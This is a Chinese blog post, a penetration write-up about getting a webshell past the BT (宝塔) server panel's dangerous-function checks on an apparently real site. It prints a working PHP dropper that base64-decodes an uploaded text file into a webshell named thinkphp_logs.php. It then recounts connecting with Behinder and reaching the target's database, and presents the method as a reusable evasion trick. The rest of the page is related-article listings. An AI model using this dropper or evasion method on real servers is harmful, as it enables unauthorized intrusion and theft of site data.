秘密-宝塔漏洞复现-详细网安教程

于 2024-07-10 15:42:54 发布
阅读量126 收藏 3
点赞数 2
文章标签: 上传
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84915584/article/details/140325843
版权

秘密-宝塔漏洞复现-详细网安教程

扫码领资料

获网安教程

宝塔漏洞_宝塔漏洞复现_宝塔面板漏洞

本文由掌控安全学院 -caih投稿

前几天找到个可以上传任意文件的上传点,成功上传页面并能访问,但是不能成功上传一句话,发现这台主机装了宝塔,经过反复尝试终于成功上传一句话并连接。

0x01 漏洞发现

结果前期摸索,发现了一个上传点,能上传任意文件,且会返回路径

宝塔漏洞_宝塔面板漏洞_宝塔漏洞复现

尝试上传页面,上传成功并返回地址(页面忘记截图了),到这里想着离我不远了,只有一句话的距离。

0x02 遇见障碍

一切当然没有想象中的顺利,上传一句话并没有返回路径,尝试不同的一句话,发现不管是使用冰蝎还是蚁剑的免杀马都不能成功返回路径,工具扫一波发现使用的是宝塔。

在宝塔官网发现,应该是禁用了危险函数,对我们上传的php文件会进行检查,看是否存在危险函数。

0x03 新思路

宝塔面板漏洞_宝塔漏洞复现_宝塔漏洞

那么就得换一种思路,既然上传上去的一句话连不上,就尝试在本地生成一个一句话。由于我们能上传任意文件,于是先上传一个加密的一句话文本即txt文件,返回文件路径IDw/=

宝塔漏洞复现_宝塔面板漏洞_宝塔漏洞

接下来我们上传一个将上述txt文件进行解码并生成一个名叫.php的一句话的php文件。内容为:

<?php$path = “./“;$path = $path.”1.txt”;echo $path;//$fp = fopen(“$path”,”r”);//$str = fread($fp,filesize($path));$str = file_get_contents(“$path”,”r”);$str = base64_decode($str);echo $str;$handle = fopen(“./thinkphp_logs.php”,”w”);fwrite($handle,$str);fclose($handle);?>

宝塔漏洞_宝塔面板漏洞_宝塔漏洞复现

如上,由于此文件并没有危险函数,所以并未被删除,成功返回路径,需要执行这个php文件就得在web上访问一下他,利用返回的路径,在浏览器访问这个文件,该文件成功执行

宝塔漏洞复现_宝塔面板漏洞_宝塔漏洞

一句话在本地生成,宝塔并未删除,用冰蝎连接,连接成功

宝塔面板漏洞_宝塔漏洞复现_宝塔漏洞

但是由于使用了宝塔,限制得很死并不能执行任何命令,只能连数据库,并未成功

宝塔漏洞复现_宝塔面板漏洞_宝塔漏洞

0x04 总结

这次并没有成功的,只是获取了数据库。这里只是讲述了文件上传的新思路,如果不能成功上传一句话就不需要再去尝试直接上传一句话,可以考虑先上传不会被查杀的php文件,然后通过这个文件生成一句话,按照这种思路,生成一句话的方法就有很多种,就不限于这种加密之后再解密。

 

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
 

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
 


 

没看够~?欢迎关注!
 

分享本文到朋友圈,可以凭截图找老师领取
 

上千教程+工具+靶场账号
 

宝塔面板漏洞_宝塔漏洞_宝塔漏洞复现
 

 分享后扫码加我
 

 

回顾往期内容
 

Xray挂机刷漏洞
 

零基础学黑客,该怎么学?
 

网络安全人员必考的几本证书!
 

文库|内网神器cs4.0使用说明书
 

代码审计 | 这个CNVD证书拿的有点轻松
 

【精选】SRC快速入门+上分小秘籍+实战指南
 

    代理池工具撰写 | 只有无尽的跳转,没有封禁的IP!
 

 

点赞+在看支持一下吧~感谢看官老爷~ 
 

你的点赞是我更新的动力
 

~
 

网络安全学习,我们一起交流
 

~

                

        

        

    




    

      

        

            

              
                
                  黑客小媚子
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    2
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    3
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
简单的Apache Airflow(CVE-2022-40127)漏洞复现

				
			

			

				

					kali_Ma的博客
				

				

					12-09
					
					1474
					
				

			

		

		

			
				
Apache Airflow 是一个可编程,调度和监控的工作流平台,基于有向无环图(DAG),Airflow 可以定义一组有依赖的任务,按照依赖依次执行。官方已发布版本 2.4.3,可升级Apache Airflow版本到2.4.0或以上,或者停用默认 Dags。当攻击者可访问到Apache Airflow的后台,且环境中存在默认。

			
		

	



                

              
                



	

		

			

				
					
宝塔计划任务访问url_宝塔面板漏洞复现

				
			

			

				

					weixin_39520353的博客
				

				

					11-18
					
					958
					
				

			

		

		

			
				
一、漏洞介绍0x01 宝塔介绍 宝塔面板是一款服务器管理软件,支持windows和linux系统,可以通过Web端轻松管理服务器,提升运维效率。例如:创建管理网站、FTP、数据库,拥有可视化文件管理器,可视化软件管理器,可视化CPU、内存、流量监控图表,计划任务等功能。0x02 漏洞介绍 宝塔的特定版本存在phpmyadmin未授权访问漏洞,攻击者可以通过...

			
		

	



                


  
              

                


	

		

			

				
					
宝塔漏洞复现

				
			

			

				

					黑白的博客
				

				

					09-06
					
					9999
					
				

			

		

		

			
				
声明
好好学习,天天向上
漏洞描述
宝塔面板是一款服务器管理软件,支持windows和linux系统,可以通过Web端轻松管理服务器,提升运维效率。例如:创建管理网站、FTP、数据库,拥有可视化文件管理器,可视化软件管理器,可视化CPU、内存、流量监控图表,计划任务等功能
该漏洞是phpmyadmin未鉴权,可通过特定地址直接登录数据库的漏洞
影响范围
宝塔Linux面板7.4.2版本
宝塔Linux测试版7.5.13
Windows面板6.8版本
复现过程
漏洞镜像可以用docker获取
先配置加速器(公

			
		

	





	

		

			

				
					
vulfocus Apache log4j2-RCE 漏洞复现(CVE-2021-44228)

				
			

			

				

					qq_45780190的博客
				

				

					12-15
					
					5005
					
				

			

		

		

			
				
根据提示,漏洞存在于http://xxxxx/hello的payload参数中,并以post的方式传参,因此我们可以利用hackerbar进行漏洞验证

创建靶场后是这样一个页面。

使用payload验证,发现可以触发dnslog,可以确认可以利用

证明存在JNDI注入漏洞。
在这里我们需要用到JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar来生成payload,建立1389和8080端口的服务。用于远程命令执行使靶机来访问我准备好的EXP从而进行更安全的被动连接,

			
		

	



		

			
		



	

		

			

				
					
宝塔7.4.2漏洞复现

				
			

			

				

					震山的博客
				

				

					08-20
					
					1771
					
				

			

		

		

			
				
复现宝塔当时广为流传的 pma 非授权访问漏洞

			
		

	





	

		

			

				
					
MinIO未授权SSRF漏洞复现(CVE-2021-21287)

				
			

			

				

					isxiaole的博客
				

				

					09-27
					
					8202
					
				

			

		

		

			
				
MinIO 是一款基于Go语言发开的高性能、分布式的对象存储系统。由于MinIO组件中LoginSTS接口设计不当,导致存在服务器端请求伪造漏洞。攻击者可以通过构造URL来发起服务器端请求伪造攻击成功利用此漏洞的攻击者能够通过利用服务器上的功能来读取、更新内部资源或执行任意命令。

			
		

	





	

		

			

				
					
CVE-2022-27778漏洞修复

				
			

			

				

					计算机辅助工程
				

				

					08-11
					
					8863
					
				

			

		

		

			
				
漏洞修复

			
		

	





	

		

			

				
					
maccms-cve_2017_17733漏洞复现

				
			

			

				

					qq_51459600的博客
				

				

					03-02
					
					3947
					
				

			

		

		

			
				
maccms-cve_2017_17733
Maccms是一套跨平台的基于PHP和MySQL快速建站系统。 Maccms 8.x版本中存在安全漏洞。远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。
环境搭建
靶机:CentOS7(192.168.2.110)
利用本地vulfocus平台一键搭建maccms环境:


环境搭建完成

漏洞利用
访问http://192.168.2.110:59973/index.php?m=vod-search
post提

			
		

	





	

		

			

				
					
Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)复现

				
			

			

				

					YouthBelief的博客
				

				

					10-31
					
					930
					
				

			

		

		

			
				
Shiro漏洞复现前言一、Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)0x01 漏洞描述0x02 影响范围0x03 漏洞利用0x04 漏洞修复总结

前言
一、Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)
0x01 漏洞描述
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会管理。Shiro框架直观、易用,同时也能提供健壮的安全性。
Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为

			
		

	





	

		

			

				
					
PHP节节云-宝塔主机面板 v1.0.13 源码下载

				
			

			

				

					10-24
				

			

		

		

			
				
节节云-宝塔主机面板包含了批量建站,权限分配,站点同步,多台服务器多站点统一化管理,一键登录宝塔面板等功能。 应用类型:宝塔站点(主机管理) 应用描述:支持Windows/Linux系统,同步宝塔站点和管理站点(包含...

			
		

	





	

		

			

				
					
java前后端部署 -宝塔-阿里云

					
最新发布

				
			

			

				

					07-03
				

			

		

		

			
				
java前后端部署 -宝塔-阿里云

			
		

	





	

		

			

				
					
节节云-宝塔主机面板IDC-v1.0.13.zip

				
			

			

				

					03-27
				

			

		

		

			
				
节节云-宝塔主机面板包含了批量建站,权限分配,站点同步,多台服务器多站点统一化管理,一键登录宝塔面板等功能。应用类型:宝塔站点(主机管理)应用描述:支持Windows/Linux系统,同步宝塔站点和管理站点(包含...

			
		

	





	

		

			

				
					
linux-宝塔Linux面板简单好用的服务器运维面板

				
			

			

				

					08-13
				

			

		

		

			
				
【Linux开发-其它】:宝塔Linux面板是针对服务器运维人员设计的一款高效、便捷的管理工具,它使得在Linux环境中进行网站部署、数据库管理、文件处理等任务变得更加简单直观。这款面板提供了图形化的操作界面,使得...

			
		

	





	

		

			

				
					
节节云-宝塔主机面板 v1.0.13.zip

				
			

			

				

					04-02
				

			

		

		

			
				
"节节云-宝塔主机面板 v1.0.13.zip" 是一个包含宝塔主机面板的软件包,主要用于管理服务器和Web服务。宝塔面板是一款流行的Linux服务器管理工具,它提供了图形化的用户界面,使得用户能够方便地进行网站、数据库、...

			
		

	





	

		

			

				
					
人工智能——机器学习

				
			

			

				

					咸鱼菌
				

				

					02-18
					
					1805
					
				

			

		

		

			
				
人工智能——机器学习什么是机器学习监督学习分类问题回归问题函数过度学习无监督学习聚类k-means方法强化学习
什么是机器学习
让机器设备(计算机)学习,也就是所谓的“机器学习”。
比如计算机通过学习能够自发认识到不同品种的猫都是猫,能够假设各种不同的情况,并且知道不同情况下如何应对。在没有人为设定的程序下也能自动完成任务,就必须要让计算机学习事物的特征和规则,这就是机器学习。
机器学习大致分为【监督学习】【无监督学习】【强化学习】

监督学习
监督学习就是将数据和正确答案的组合导入计算机内令其学习特征和规

			
		

	





	

		

			

				
					
机器学习从理论到实践(常见算法)

				
			

			

				

					m0_52118763的博客
				

				

					02-23
					
					1736
					
				

			

		

		

			
				
机器学习引言
1.1
机器学习是什么?先看下面这张图片
我们人是怎么分辨的,可能是通过是否有胡须,喉结,长发短发等特征区别的。那么机器如何完成这个过程。
“学习”的概念
请分别讨论下列各组数据的内部关系,并填空。
y1y_1y1​ = x1x_1x1​ + 1.5
y2y_2y2​ = x22x_2^2x22​ + 1.5
y=x132+x22+1y = x_1^\frac{3}{2} + x_2^2 + 1y=x123​​+x22​+1
下列鸢尾花分别属于哪一类:setosa、versicolor、vir

			
		

	





	

		

			

				
					
特斯拉“纯视觉路线”能去掉ISP吗?

				
			

			

				

					吴建明wujianming_110117
				

				

					02-20
					
					899
					
				

			

		

		

			
				
特斯拉“纯视觉路线”能去掉ISP吗?
对特斯拉死磕的“纯视觉路线”,持质疑态度的。质疑的点在于:算法的进步,能弥补摄像头物理性能的局限性吗?比如,视觉算法足够牛逼时,摄像头就有测距能力了?晚上就能看见了?
前一个疑问,在2021年7月份被打消——当时,特斯拉被曝已开发出“纯视觉测距”技术。而后一个疑问,则持续存在。如果把摄像头类比为人眼、把视觉算法类比为人的大脑中“跟眼睛配合的那一部分功能”,“视觉算法足够牛逼时,就可以不需要激光雷达”这种观点就相当于说“只要我的脑子足够聪明,眼睛高度近视也没关系”。马斯克

			
		

	





	

		

			

				
					
神经网络案例

				
			

			

				

					最白の白菜的博客
				

				

					02-20
					
					3883
					
				

			

		

		

			
				
目录神经网络案例数据加载数据处理模型构建模型编译模型训练模型测试模型保存总结
神经网络案例
学习目标

能够利用tf.keras获取数据集
能够网络多层神经网络的构建
能够完成网络的训练和评估


使用手写数字的MNIST数据集如上图所示,该数据集包含60,000个用于训练的样本和10,000个用于测试的样本,图像是固定大小(28x28像素),其值为0到255。
整个案例的实现流程是:

数据加载
数据处理
模型构建
模型训练
模型测试
模型保存

首先要导入所需的工具包:
# 导入相应的工具包
impor

			
		

	





	

		

			

				
					
Flink 新一代流计算和容错——阶段总结和展望

				
			

			

				

					Ververica的博客
				

				

					02-24
					
					932
					
				

			

		

		

			
				
▼ 关注「Apache Flink」,获取更多技术干货▼摘要:本文整理自 Apache Flink 引擎架构师、阿里巴巴存储引擎团队负责人梅源在 Flink Forward Asia 2...

			
		

	





	

		

			

				
					
frp内网穿透搭建-宝塔

				
			

			

				

					12-29
				

			

		

		

			
				
Frp是一个常用的内网穿透工具,而宝塔是一款简单易用的服务器管理面板。将宝塔与frp搭建结合可以实现内网穿透的功能,下面是实现该功能的步骤:

1. 安装宝塔面板:通过wget命令下载宝塔面板的安装脚本,然后执行安装命令进行安装。安装完成后,通过浏览器访问服务器的IP地址,即可进入宝塔面板的登录页面。

2. 登录宝塔面板:在登录页面中输入用户名和密码,点击登录按钮即可登录到宝塔面板的控制台。

3. 添加网站:在宝塔面板控制台内,点击“网站”选项卡,然后点击“添加网站”按钮。在添加网站的页面中,填写站点名称、绑定域名等信息,并选择对应的站点目录。

4. 配置frp:在宝塔面板控制台内,点击“软件商店”选项卡,然后搜索并安装“frps”软件。安装完成后,点击“软件管理”选项卡,在列表中找到“frp”,点击“设置”按钮进行配置。

5. 配置frp参数:在frp配置页面中,填写服务器IP地址、远程端口等参数,并保存配置。然后点击“启动”按钮启动frp。

6. 完成内网穿透:在PC端安装frp客户端,然后根据frp客户端的配置文档,配置客户端的参数。将客户端与服务器进行连接,即可完成内网穿透。

通过以上步骤,我们可以通过宝塔与frp搭建一个内网穿透的环境。这样就可以实现远程访问内网服务器或应用的功能,方便了服务器管理与应用开发。

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值